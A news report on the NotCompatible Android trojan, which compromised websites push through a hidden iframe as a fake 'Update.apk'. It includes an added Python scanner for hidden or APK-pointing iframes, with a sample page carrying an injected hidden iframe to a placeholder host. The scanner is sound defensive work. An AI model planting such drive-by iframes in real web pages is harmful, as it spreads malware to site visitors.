According to a blog by Lookout Mobile Security, this is the first time it has identified infected websites as being used to specifically target mobile devices. However, it also said that affected sites appear to have relatively low traffic and it expected the total impact to Android users to be low.
It said that the Android-specific Trojan ‘NotCompatible’ appears to serve as a simple TCP relay/proxy while posing as a system update, and does not appear to cause any direct harm to the infected device – but it could be used to gain illicit access to private networks by turning that device into a proxy.
It explained that in this specific attack, if a user visits a compromised website from an Android device, the browser automatically begins downloading an application named ‘Update.apk’; when the download finishes, the device displays a notification prompting the user to install the app.
To actually install the app, the device must have the “Unknown sources” setting enabled (commonly known as “sideloading”); otherwise the installation is blocked.
The compromised website triggers the download through a hidden iframe at the bottom of each page. Lookout also said the Trojan does not go to great lengths to hide its intended purpose, but a device infected with NotCompatible could be used to gain access to normally protected information or systems.
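From the defender's side, the injected hidden iframe Lookout describes is something a site owner can scan for. The following is an added example, not code from Lookout or from the article: a small Python scanner that flags iframes in a page's HTML that are invisible, 1x1, or point at an .apk file. The sample page and its URL are constructed placeholders.

```python
"""Flag hidden iframes of the kind used for drive-by APK downloads.

Added illustration, not Lookout's or any vendor's code. The sample HTML
below is constructed here; the URL in it is a placeholder, not a real indicator.
"""
import re
from html.parser import HTMLParser

# Style fragments that make an element invisible to the user.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _is_tiny(value):
    """True for width/height attribute values of 0 or 1 pixel ('0', '1px')."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are hidden, tiny, or point at an APK file."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        reasons = []
        if HIDDEN_STYLE.search(a.get("style") or ""):
            reasons.append("hidden-style")
        if _is_tiny(a.get("width")) or _is_tiny(a.get("height")):
            reasons.append("tiny-size")
        src = a.get("src") or ""
        if src.lower().endswith(".apk"):
            reasons.append("apk-src")
        if reasons:
            self.findings.append({"src": src, "line": self.getpos()[0], "reasons": reasons})


def find_hidden_iframes(html):
    """Return a list of suspicious iframes found in the page source."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a benign embed plus an injected iframe at the bottom.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://video.example.net/embed/1" width="640" height="360"></iframe>
<iframe src="http://placeholder-host.invalid/Update.apk" width="1" height="1"
        style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE):
        print(f"line {f['line']}: {f['src']} ({', '.join(f['reasons'])})")
```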
Google removed malicious applications in December 2011 after they had been downloaded 14,000 times, while in March 2011, 21 free applications were taken off the Android Market after they were discovered to be malicious.